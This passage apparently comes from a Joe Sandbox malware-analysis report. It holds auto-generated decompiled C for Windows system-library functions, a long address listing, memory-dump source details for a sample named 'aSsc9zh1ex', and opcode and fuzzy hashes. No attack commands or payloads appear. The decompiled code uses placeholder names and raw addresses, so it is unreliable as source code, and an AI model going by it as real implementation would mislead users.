				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x1d81bd28);
				_push(E1D78AD20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x1d83b370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E1D748120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E1D7480BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E1D748009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E1D788F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L1D7453C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E1D746055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E1D746074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E1D746179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E1D77B490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E1D7463CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L1D752330(_t268, _t377 + 0x2c);
										E1D814407(_t377);
										E1D7524D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E1D7464F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x1d836644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E1D755D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E1D7846E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E1D788F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											E1D746D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E1D746D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E1D746E00;
											if(_t342 == E1D746E00) {
												E1D746E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E1D7461C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push(4);
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E1D7843A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L1D752330(_t288, _t377 + 0x2c);
														E1D814407(_t377);
														E1D7524D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E1D747290;
											if(_t342 != E1D747290) {
												__eflags = _t342 - E1D745570;
												if(_t342 != E1D745570) {
													 *0x1d8391e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E1D745570( &_v216);
												goto L33;
											}
											E1D747290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E1D746970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E1D73BE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E1D746929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E1D746B70) {
											__eflags = _t384 - E1D7456E0;
											if(_t384 != E1D7456E0) {
												 *0x1d8391e0();
												 *_t384();
											} else {
												E1D7456E0(_t361);
											}
										} else {
											E1D746B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E1D747F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L1D752330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E1D7524D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E1D788F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E1D744A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E1D7829A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}












































































































                                                                                                                              0x1d7458e0
                                                                                                                              0x1d7458e0
                                                                                                                              0x1d7458e0
                                                                                                                              0x1d7458e5
                                                                                                                              0x1d7458e7
                                                                                                                              0x1d7458ec
                                                                                                                              0x1d7458f7
                                                                                                                              0x1d7458f8
                                                                                                                              0x1d7458fe
                                                                                                                              0x1d745903
                                                                                                                              0x1d745906
                                                                                                                              0x1d745908
                                                                                                                              0x1d74590b
                                                                                                                              0x1d74590c
                                                                                                                              0x1d74590d
                                                                                                                              0x1d74590e
                                                                                                                              0x1d745912
                                                                                                                              0x1d745918
                                                                                                                              0x1d74591b
                                                                                                                              0x1d74591e
                                                                                                                              0x1d745928
                                                                                                                              0x1d74592e
                                                                                                                              0x1d745935
                                                                                                                              0x1d74593c
                                                                                                                              0x1d745943
                                                                                                                              0x1d74594a
                                                                                                                              0x1d745951
                                                                                                                              0x1d745958
                                                                                                                              0x1d74595f
                                                                                                                              0x1d745966
                                                                                                                              0x1d745970
                                                                                                                              0x1d74597a
                                                                                                                              0x1d745985
                                                                                                                              0x1d74598b
                                                                                                                              0x1d745998
                                                                                                                              0x1d74599d
                                                                                                                              0x1d7459a3
                                                                                                                              0x1d7459a8
                                                                                                                              0x1d7459b0
                                                                                                                              0x1d7459b2
                                                                                                                              0x1d7459b8
                                                                                                                              0x1d7459b8
                                                                                                                              0x1d7459c8
                                                                                                                              0x1d7459cd
                                                                                                                              0x1d7459d0
                                                                                                                              0x1d7459d7
                                                                                                                              0x1d7459e5
                                                                                                                              0x1d7459ea
                                                                                                                              0x1d7459f8
                                                                                                                              0x1d7a0745
                                                                                                                              0x1d7a074f
                                                                                                                              0x1d7a074f
                                                                                                                              0x1d7a0756
                                                                                                                              0x1d745a25
                                                                                                                              0x1d745a25
                                                                                                                              0x1d745a2c
                                                                                                                              0x1d745a31
                                                                                                                              0x1d745a38
                                                                                                                              0x1d745fef
                                                                                                                              0x1d745fef
                                                                                                                              0x1d745ff6
                                                                                                                              0x1d745ffb
                                                                                                                              0x1d746002
                                                                                                                              0x1d746007
                                                                                                                              0x1d746007
                                                                                                                              0x1d746009
                                                                                                                              0x1d74600f
                                                                                                                              0x1d746017
                                                                                                                              0x1d74601c
                                                                                                                              0x1d74601c
                                                                                                                              0x1d745b95
                                                                                                                              0x1d745b99
                                                                                                                              0x1d745f2d
                                                                                                                              0x1d745f32
                                                                                                                              0x1d745f36
                                                                                                                              0x1d745f36
                                                                                                                              0x1d745ba1
                                                                                                                              0x1d745fcf
                                                                                                                              0x1d745fcf
                                                                                                                              0x1d745fd4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d745fd6
                                                                                                                              0x1d745fd6
                                                                                                                              0x1d745fd9
                                                                                                                              0x1d7a07dc
                                                                                                                              0x1d7a07e3
                                                                                                                              0x1d7a07e5
                                                                                                                              0x1d7a07ea
                                                                                                                              0x00000000
                                                                                                                              0x1d7a07ea
                                                                                                                              0x1d745fdf
                                                                                                                              0x1d745fe2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d745fe8
                                                                                                                              0x00000000
                                                                                                                              0x1d745ba7
                                                                                                                              0x1d745ba9
                                                                                                                              0x1d745e71
                                                                                                                              0x1d745e77
                                                                                                                              0x1d745e79
                                                                                                                              0x1d745bb4
                                                                                                                              0x1d745bba
                                                                                                                              0x1d7a0836
                                                                                                                              0x1d7a083a
                                                                                                                              0x1d7a0841
                                                                                                                              0x1d7a0847
                                                                                                                              0x1d7a0847
                                                                                                                              0x1d745bd4
                                                                                                                              0x1d745bda
                                                                                                                              0x1d745be0
                                                                                                                              0x1d745be7
                                                                                                                              0x00000000
                                                                                                                              0x1d745bed
                                                                                                                              0x1d745bf3
                                                                                                                              0x1d745ae0
                                                                                                                              0x1d745ae0
                                                                                                                              0x1d745aec
                                                                                                                              0x1d745aef
                                                                                                                              0x1d745af2
                                                                                                                              0x1d745af5
                                                                                                                              0x1d745af8
                                                                                                                              0x1d745afb
                                                                                                                              0x1d745b07
                                                                                                                              0x1d745f69
                                                                                                                              0x1d745f73
                                                                                                                              0x1d745f8b
                                                                                                                              0x1d745f90
                                                                                                                              0x1d745f92
                                                                                                                              0x1d7a077f
                                                                                                                              0x1d7a077f
                                                                                                                              0x1d7a0789
                                                                                                                              0x1d745b43
                                                                                                                              0x1d745b43
                                                                                                                              0x1d745b49
                                                                                                                              0x1d745b53
                                                                                                                              0x1d745b5a
                                                                                                                              0x1d745b5d
                                                                                                                              0x1d745b66
                                                                                                                              0x1d745b67
                                                                                                                              0x1d745b6d
                                                                                                                              0x1d745b6e
                                                                                                                              0x1d745b74
                                                                                                                              0x1d745b7a
                                                                                                                              0x1d745b7b
                                                                                                                              0x1d745b80
                                                                                                                              0x1d745b86
                                                                                                                              0x1d745b8f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d745b8f
                                                                                                                              0x1d745f98
                                                                                                                              0x1d745f98
                                                                                                                              0x1d745f9e
                                                                                                                              0x1d745fa0
                                                                                                                              0x1d745fa7
                                                                                                                              0x1d745fae
                                                                                                                              0x1d745fb1
                                                                                                                              0x00000000
                                                                                                                              0x1d745fb1
                                                                                                                              0x1d745b13
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d745b19
                                                                                                                              0x1d745b30
                                                                                                                              0x1d745b35
                                                                                                                              0x1d745b3b
                                                                                                                              0x1d745b41
                                                                                                                              0x00000000
                                                                                                                              0x1d745b41
                                                                                                                              0x1d745bf9
                                                                                                                              0x1d745bfe
                                                                                                                              0x1d745e84
                                                                                                                              0x1d745e8d
                                                                                                                              0x1d745e93
                                                                                                                              0x1d745ea1
                                                                                                                              0x1d745ea9
                                                                                                                              0x1d745eb4
                                                                                                                              0x1d745eb9
                                                                                                                              0x1d745ec0
                                                                                                                              0x1d745ec6
                                                                                                                              0x1d745ec7
                                                                                                                              0x1d745ed0
                                                                                                                              0x1d745ed1
                                                                                                                              0x1d745ed2
                                                                                                                              0x1d745ed8
                                                                                                                              0x1d745f15
                                                                                                                              0x1d745d52
                                                                                                                              0x1d745d52
                                                                                                                              0x1d745d59
                                                                                                                              0x1d745d60
                                                                                                                              0x1d7a0909
                                                                                                                              0x1d7a0909
                                                                                                                              0x1d745d6d
                                                                                                                              0x1d745d74
                                                                                                                              0x1d745d81
                                                                                                                              0x1d745d86
                                                                                                                              0x1d745d8d
                                                                                                                              0x1d745d9e
                                                                                                                              0x1d7a0955
                                                                                                                              0x1d7a0958
                                                                                                                              0x1d7a095e
                                                                                                                              0x1d7a0960
                                                                                                                              0x1d7a0963
                                                                                                                              0x1d7a0969
                                                                                                                              0x1d7a0969
                                                                                                                              0x1d7a096f
                                                                                                                              0x1d7a096f
                                                                                                                              0x1d7a096f
                                                                                                                              0x1d7a096f
                                                                                                                              0x1d7a0971
                                                                                                                              0x1d7a0977
                                                                                                                              0x1d7a0979
                                                                                                                              0x1d7a0989
                                                                                                                              0x1d7a0992
                                                                                                                              0x1d7a0998
                                                                                                                              0x1d7a099c
                                                                                                                              0x1d7a099e
                                                                                                                              0x1d7a09a4
                                                                                                                              0x1d7a09a6
                                                                                                                              0x1d7a09ac
                                                                                                                              0x1d7a09ac
                                                                                                                              0x1d7a09b4
                                                                                                                              0x1d7a09b4
                                                                                                                              0x1d7a09bc
                                                                                                                              0x1d7a09c6
                                                                                                                              0x1d7a09ce
                                                                                                                              0x1d7a09cf
                                                                                                                              0x1d7a09d1
                                                                                                                              0x1d7a09d4
                                                                                                                              0x1d745da4
                                                                                                                              0x1d745da4
                                                                                                                              0x1d745dac
                                                                                                                              0x1d745f0b
                                                                                                                              0x1d745f0b
                                                                                                                              0x1d745db8
                                                                                                                              0x1d7a09e2
                                                                                                                              0x1d7a09e9
                                                                                                                              0x1d7a09ef
                                                                                                                              0x1d7a09ef
                                                                                                                              0x1d745dbe
                                                                                                                              0x1d745dc1
                                                                                                                              0x1d745dc7
                                                                                                                              0x1d745dc9
                                                                                                                              0x1d745dcc
                                                                                                                              0x1d745dd2
                                                                                                                              0x1d745de0
                                                                                                                              0x1d745de0
                                                                                                                              0x1d745de2
                                                                                                                              0x1d745de8
                                                                                                                              0x1d745dea
                                                                                                                              0x1d745df0
                                                                                                                              0x1d745df3
                                                                                                                              0x1d745e00
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d745e08
                                                                                                                              0x1d745eec
                                                                                                                              0x1d745eef
                                                                                                                              0x1d7a09f9
                                                                                                                              0x1d7a0a00
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a0a06
                                                                                                                              0x1d745ef7
                                                                                                                              0x1d745f00
                                                                                                                              0x1d745e29
                                                                                                                              0x1d745e29
                                                                                                                              0x1d745e2c
                                                                                                                              0x1d745e34
                                                                                                                              0x1d745e38
                                                                                                                              0x1d745e3a
                                                                                                                              0x1d745e40
                                                                                                                              0x1d745e42
                                                                                                                              0x1d745e4e
                                                                                                                              0x00000000
                                                                                                                              0x1d745e58
                                                                                                                              0x1d745e58
                                                                                                                              0x1d745e5e
                                                                                                                              0x1d745e66
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d745e6c
                                                                                                                              0x1d745e4e
                                                                                                                              0x1d745e0e
                                                                                                                              0x1d745e0e
                                                                                                                              0x1d745e21
                                                                                                                              0x1d745e23
                                                                                                                              0x00000000
                                                                                                                              0x1d745e23
                                                                                                                              0x1d745de0
                                                                                                                              0x00000000
                                                                                                                              0x1d745d9e
                                                                                                                              0x1d745eda
                                                                                                                              0x1d745ee0
                                                                                                                              0x1d745f53
                                                                                                                              0x1d745f59
                                                                                                                              0x1d74602d
                                                                                                                              0x1d746033
                                                                                                                              0x1d746035
                                                                                                                              0x00000000
                                                                                                                              0x1d746035
                                                                                                                              0x1d745f5f
                                                                                                                              0x00000000
                                                                                                                              0x1d745f5f
                                                                                                                              0x1d745ee2
                                                                                                                              0x00000000
                                                                                                                              0x1d745ee2
                                                                                                                              0x1d745c04
                                                                                                                              0x1d745c0a
                                                                                                                              0x1d745c0b
                                                                                                                              0x1d745c11
                                                                                                                              0x1d745c1a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d745c24
                                                                                                                              0x1d746047
                                                                                                                              0x1d74604c
                                                                                                                              0x1d74604c
                                                                                                                              0x1d745c2a
                                                                                                                              0x1d745c30
                                                                                                                              0x1d745c3a
                                                                                                                              0x1d745c40
                                                                                                                              0x1d745c4c
                                                                                                                              0x1d745c52
                                                                                                                              0x1d745c5f
                                                                                                                              0x1d745c68
                                                                                                                              0x1d745c71
                                                                                                                              0x1d745c7a
                                                                                                                              0x1d745c7d
                                                                                                                              0x1d745c85
                                                                                                                              0x1d745c9e
                                                                                                                              0x1d745ca1
                                                                                                                              0x1d745ca7
                                                                                                                              0x1d745cad
                                                                                                                              0x1d745cba
                                                                                                                              0x1d7a087c
                                                                                                                              0x1d745cc0
                                                                                                                              0x1d745cc0
                                                                                                                              0x1d745cc0
                                                                                                                              0x1d745cc4
                                                                                                                              0x1d7a0886
                                                                                                                              0x1d7a0889
                                                                                                                              0x1d7a0889
                                                                                                                              0x1d745cd1
                                                                                                                              0x1d7a0897
                                                                                                                              0x1d7a0897
                                                                                                                              0x1d745cf0
                                                                                                                              0x1d7a08a2
                                                                                                                              0x1d7a08a2
                                                                                                                              0x1d745cf6
                                                                                                                              0x1d745cfc
                                                                                                                              0x1d745d09
                                                                                                                              0x1d7a08ae
                                                                                                                              0x1d7a08ae
                                                                                                                              0x1d745d0f
                                                                                                                              0x1d745d15
                                                                                                                              0x1d745d22
                                                                                                                              0x1d7a08ba
                                                                                                                              0x1d7a08ba
                                                                                                                              0x1d745d22
                                                                                                                              0x1d745d28
                                                                                                                              0x1d745d2f
                                                                                                                              0x1d745d37
                                                                                                                              0x1d745d39
                                                                                                                              0x1d745d40
                                                                                                                              0x1d745d47
                                                                                                                              0x1d745f41
                                                                                                                              0x1d745f47
                                                                                                                              0x1d745fc2
                                                                                                                              0x1d745fc8
                                                                                                                              0x1d745f49
                                                                                                                              0x1d745f49
                                                                                                                              0x1d745f49
                                                                                                                              0x1d745d4d
                                                                                                                              0x1d745d4d
                                                                                                                              0x1d745d4d
                                                                                                                              0x00000000
                                                                                                                              0x1d745d47
                                                                                                                              0x1d745be7
                                                                                                                              0x1d745e7f
                                                                                                                              0x1d745baf
                                                                                                                              0x00000000
                                                                                                                              0x1d745baf
                                                                                                                              0x1d745ba1
                                                                                                                              0x1d745a46
                                                                                                                              0x1d745a4b
                                                                                                                              0x1d745a52
                                                                                                                              0x1d745a5f
                                                                                                                              0x1d745a64
                                                                                                                              0x1d745a6b
                                                                                                                              0x1d745a71
                                                                                                                              0x1d745a76
                                                                                                                              0x1d7a0772
                                                                                                                              0x1d746068
                                                                                                                              0x1d746073
                                                                                                                              0x1d746073
                                                                                                                              0x1d745a7c
                                                                                                                              0x1d745a82
                                                                                                                              0x1d745a88
                                                                                                                              0x1d745a8e
                                                                                                                              0x1d745a92
                                                                                                                              0x1d745a95
                                                                                                                              0x1d745a9c
                                                                                                                              0x1d745aa3
                                                                                                                              0x1d745ab6
                                                                                                                              0x1d745abb
                                                                                                                              0x1d745abe
                                                                                                                              0x1d745ac5
                                                                                                                              0x1d745ace
                                                                                                                              0x1d745ad1
                                                                                                                              0x1d745ad3
                                                                                                                              0x00000000
                                                                                                                              0x1d745ad3
                                                                                                                              0x1d7459fe
                                                                                                                              0x1d745a01
                                                                                                                              0x1d745a07
                                                                                                                              0x1d745a08
                                                                                                                              0x1d745a0d
                                                                                                                              0x1d745a15
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d745a1b
                                                                                                                              0x1d745a1e
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 0-2766056989
                                                                                                                              • Opcode ID: fd20772a403a1227d603bccd22aa61c58b613ce35899e7845b990169743556bf
                                                                                                                              • Instruction ID: 380a65ba44acb0320b79591b13c649e7479a7069e83bd24cc03493de6ce2aa01
                                                                                                                              • Opcode Fuzzy Hash: fd20772a403a1227d603bccd22aa61c58b613ce35899e7845b990169743556bf
                                                                                                                              • Instruction Fuzzy Hash: A4327D74D0426ADFDB22CF64C884BEDBBB0BF08324F1481EAD549A7651D7746A84CF92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D74BDE0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 94%
                                                                                                                              			E1D74BDE0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8, signed short _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				void* _v4;
				intOrPtr _v16;
				char _v20;
				char _v736;
				char _v796;
				char _v1504;
				char _v1680;
				char _v2384;
				char _v2640;
				char* _v2644;
				char _v2648;
				int _v2652;
				char _v2653;
				char _v2654;
				void* _v2660;
				short _v2662;
				char _v2664;
				intOrPtr _v2668;
				int _v2672;
				char _v2676;
				int _v2684;
				char _v2688;
				char* _v2692;
				short _v2694;
				char _v2696;
				int _v2700;
				void* _v2704;
				char _v2708;
				intOrPtr* _v2712;
				signed int _v2716;
				signed int _v2720;
				short _v2722;
				char _v2724;
				signed int _v2728;
				int _v2732;
				int _v2736;
				signed int _v2740;
				char _v2744;
				int _v2748;
				int _v2752;
				int _v2756;
				void* _v2760;
				intOrPtr _v2768;
				signed int _v2772;
				int _v2780;
				char _v2784;
				char* _v2788;
				char _v2792;
				char _v2800;
				void _v2828;
				char _v2832;
				char _v2836;
				intOrPtr _t299;
				signed int _t300;
				intOrPtr _t301;
				signed int _t302;
				int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t317;
				signed int _t320;
				signed char* _t323;
				signed int _t324;
				signed char* _t325;
				signed int _t334;
				signed int _t336;
				intOrPtr _t337;
				signed int _t338;
				signed int _t340;
				signed int _t350;
				char* _t356;
				int _t369;
				signed int _t373;
				signed int _t376;
				intOrPtr* _t377;
				signed int _t378;
				signed int _t397;
				signed int _t398;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				char* _t410;
				int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t438;
				signed int _t445;
				intOrPtr _t455;
				signed int _t457;
				intOrPtr _t462;
				signed int _t467;
				intOrPtr _t469;
				signed int _t475;
				intOrPtr* _t485;
				signed int _t486;
				signed int _t489;
				signed int _t490;
				signed int _t492;
				intOrPtr* _t493;
				intOrPtr* _t502;
				signed int _t505;
				short _t515;
				void* _t520;
				void* _t527;
				intOrPtr* _t533;
				signed int _t535;
				signed int _t538;
				intOrPtr* _t543;
				signed int _t545;
				signed int _t547;
				signed int _t550;
				intOrPtr _t551;
				signed int _t553;
				void* _t554;

				_push(0xb04);
				_push(0x1d81bfd0);
				E1D797C40(__ebx, __edi, __esi);
				_v2668 = _a8;
				_v2728 = _a12 & 0x0000ffff;
				_v2712 = _a16;
				_v2740 = _a20;
				_v2708 = 0;
				_v2752 = 0;
				_t543 = 0;
				_v2704 = 0;
				_v2700 = 0;
